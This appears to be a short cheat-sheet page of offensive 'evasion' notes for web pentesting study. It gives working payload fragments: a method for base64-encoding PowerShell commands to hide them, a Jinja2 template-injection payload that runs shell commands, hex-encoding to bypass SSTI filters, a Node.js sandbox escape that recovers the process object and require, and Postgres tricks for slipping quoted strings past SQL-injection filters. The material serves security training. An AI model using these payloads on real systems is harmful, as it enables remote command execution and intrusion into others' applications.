Use stdout=-1 to dump all contents to response

R3zk0n · October 2, 2025

Evasion
Contents

    Encoding Powershell Payloads

    iconv -f ASCII -t UTF-16LE shell.txt | base64 | tr -d "\n"
powershell -EncodedCommand [result_for_iconv]

    SSTI Display Output

    {{ subclasses_r[1153](['uname', '-a'], stdout=-1).communicate()}}

    Bypass SSTI Filters

    Hex Encoding

    Source: https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f
{% set class = "\x5f\x5fmro\x5f\x5f"%}

    Node Filter Bypass

    Multi-slashing

    cmd = "\\\\x2fbin\\\\x2fbash"

shell = 'process = parts.constructor.constructor(\'return (function(){return process})()\')(); var require = process.mainModule.require;'

    Avoid Data Truncation in Fetch request

    Refer to 13.6.1

    Parsing XML using Elementree

    Refer to 10.3.5

    Other Filters

    CHR + String Concatenation
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

Replacing Quotes (Postgres)
SELECT 'AWAE';
SELECT $$AWAE$$;
SELECT $TAG$AWAE$TAG$;

    Twitter, Facebook